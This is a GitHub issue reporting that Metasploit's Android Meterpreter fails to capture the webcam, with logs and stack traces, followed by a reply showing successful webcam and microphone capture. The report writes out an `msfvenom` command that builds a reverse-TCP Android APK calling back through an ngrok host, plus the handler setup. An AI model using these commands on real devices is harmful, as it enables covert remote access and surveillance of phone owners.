Can't capture my android webcam (stdapi_webcam_start: Operation failed: 1) with meterpreter/reverse_tcp

[TariCheck]

Steps to reproduce

How'd you do it?

1. I started ngrok to make the payload work fine.
2. I used these commands to do the Android payload : msfvenom -p android/meterpreter/reverse_tcp LHOST=[ngrok ip] LPORT=[ngrok port] R > /var/www/html/system.apk msfconsole use exploit/multi/handler set payload android/meterpreter/reverse_tcp set LHOST [my ngrok platform forwarding ip] set LPORT [my ngrok platform forwarding port] exploit
3. Then I downloaded the apk and it worked perfectly. I typed this command to capture my webcam : webcam_snap -i 2

Relevant information

• Android Version : 11

Were you following a specific guide/tutorial or reading documentation?

Yes, to make it easier I tried to follow this youtube video : https://www.youtube.com/watch?v=y1cvEc3JS2A

Expected behavior

What should happen? The webcam_snap -i 2 command should capture my phone front webcam.

Current behavior

What happens instead? The command starts and crashes with this error :

meterpreter > webcam_snap -i 2

[*] Starting...

[*] Stopped

[-] stdapi_webcam_start: Operation failed: 1

And the capture was not taken.

Metasploit version

Framework: 6.2.26-dev Console : 6.2.26-dev

Module/Datastore

The following global/module datastore, and database setup was configured before the issue occurred:

Collapse

[framework/core]
loglevel=3

[framework/ui/console]
ActiveModule=exploit/multi/handler

[multi/handler]
PAYLOAD=android/meterpreter/reverse_tcp
WORKSPACE=
VERBOSE=false
WfsDelay=2
EnableContextEncoding=false
ContextInformationFile=
DisablePayloadHandler=false
ExitOnSession=true
ListenerTimeout=0
LHOST=6.tcp.eu.ngrok.io
LPORT=4545

Database Configuration

The database contains the following information:

Collapse

Session Type: postgresql selected, no connection

History

The following commands were ran during the session and before this issue occurred:

Collapse

113    set loglevel 3
114    use exploit/multi/handler
115    set payload android/meterpreter/reverse-tcp
116    set payload android/meterpreter/reverse_tcp
117    set LHOST 6.tcp.eu.ngrok.io
118    set LPORT 16260
119    exploit
120    set LPORT 4545
121    exploit
122    debug

Framework Errors

The following framework errors occurred before the issue occurred:

Collapse

[12/11/2022 17:29:27] [e(0)] core: Error loading sysinfo - NoMethodError undefined method `config' for nil:NilClass
[12/11/2022 17:29:27] [e(0)] meterpreter: Failed to load extension: No response was received to the core_enumextcmd request.
[12/11/2022 17:29:27] [e(0)] core: Rex::RuntimeError No response was received to the core_enumextcmd request.
[12/11/2022 17:29:27] [e(0)] meterpreter: Failed to load extension: No response was received to the core_enumextcmd request.
[12/11/2022 17:29:27] [e(0)] core: Rex::RuntimeError No response was received to the core_enumextcmd request.
[12/11/2022 17:29:45] [e(0)] meterpreter: stdapi_webcam_start: Operation failed: 1
[12/11/2022 17:47:23] [e(0)] meterpreter: stdapi_webcam_start: Operation failed: 1
[12/11/2022 18:13:43] [e(0)] core: Failed to connect to the database: No database YAML file
[12/11/2022 18:21:03] [e(0)] core: Exploit failed (multi/handler): Interrupt  - Interrupt 
Call stack:
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/rex-core-0.1.28/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/rex-core-0.1.28/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/rex-core-0.1.28/lib/rex/sync/thread_safe.rb:76:in `sleep'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:66:in `block in exploit'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:63:in `loop'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:63:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:181:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:182:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[12/11/2022 18:21:34] [e(0)] meterpreter: stdapi_webcam_start: Operation failed: 1

Web Service Errors

The following web service errors occurred before the issue occurred:

Collapse

msf-ws.log does not exist.

Framework Logs

The following framework logs were recorded before the issue occurred:

Collapse

/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/rex-core-0.1.28/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/rex-core-0.1.28/lib/rex/sync/thread_safe.rb:36:in `select'
/usr/share/metasploit-framework/vendor/bundle/ruby/3.0.0/gems/rex-core-0.1.28/lib/rex/sync/thread_safe.rb:76:in `sleep'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:66:in `block in exploit'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:63:in `loop'
/usr/share/metasploit-framework/modules/exploits/multi/handler.rb:63:in `exploit'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:228:in `job_run_proc'
/usr/share/metasploit-framework/lib/msf/core/exploit_driver.rb:181:in `run'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:144:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/base/simple/exploit.rb:171:in `exploit_simple'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:45:in `exploit_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:182:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[12/11/2022 18:21:24] [d(0)] core: HistoryManager.push_context name: :meterpreter
[12/11/2022 18:21:34] [e(0)] meterpreter: stdapi_webcam_start: Operation failed: 1
[12/11/2022 18:21:34] [d(0)] meterpreter: Call stack:
/usr/share/metasploit-framework/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb:41:in `webcam_start'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/webcam.rb:108:in `cmd_webcam_snap'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:102:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:64:in `block in interact'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:157:in `run'
/usr/share/metasploit-framework/lib/rex/post/meterpreter/ui/console.rb:62:in `interact'
/usr/share/metasploit-framework/lib/msf/base/sessions/meterpreter.rb:565:in `_interact'
/usr/share/metasploit-framework/lib/rex/ui/interactive.rb:53:in `interact'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1682:in `cmd_sessions'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:192:in `cmd_exploit'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:581:in `run_command'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:530:in `block in run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `each'
/usr/share/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:524:in `run_single'
/usr/share/metasploit-framework/lib/rex/ui/text/shell.rb:162:in `run'
/usr/share/metasploit-framework/lib/metasploit/framework/command/console.rb:48:in `start'
/usr/share/metasploit-framework/lib/metasploit/framework/command/base.rb:82:in `start'
/usr/bin/msfconsole:23:in `<main>'
[12/11/2022 18:21:41] [d(0)] core: HistoryManager.pop_context name: :meterpreter

Web Service Logs

The following web service logs were recorded before the issue occurred:

Collapse

msf-ws.log does not exist.

Version/Install

The versions and install method of your Metasploit setup:

Collapse

Framework: 6.2.26-dev
Ruby: ruby 3.0.4p208 (2022-04-12 revision 3fa771dded) [x86_64-linux-gnu]
OpenSSL: OpenSSL 3.0.5 5 Jul 2022
Install Root: /usr/share/metasploit-framework
Session Type: postgresql selected, no connection
Install Method: Other - Please specify

[github-actions[bot]]

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[github-actions[bot]]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

[mikelkarma]

https://github.com/mikelkarma/Meterpreter-Android

meterpreter > sysinfo
Computer        : localhost
OS              : Android 13 - Linux 4.19.191-perf-g3c7e48ca8847 (aarch64)
Architecture    : aarch64
System Language : pt_BR
Meterpreter     : dalvik/android
meterpreter > webcam_snap -i 2
[*] Starting...
[+] Got frame
[*] Stopped
Webcam shot saved to: /root/android/bOjFlXzC.jpeg
meterpreter > record_mic -d 5
[*] Starting...
[*] Stopped
Audio saved to: /root/android/TLbcSexf.wav
meterpreter >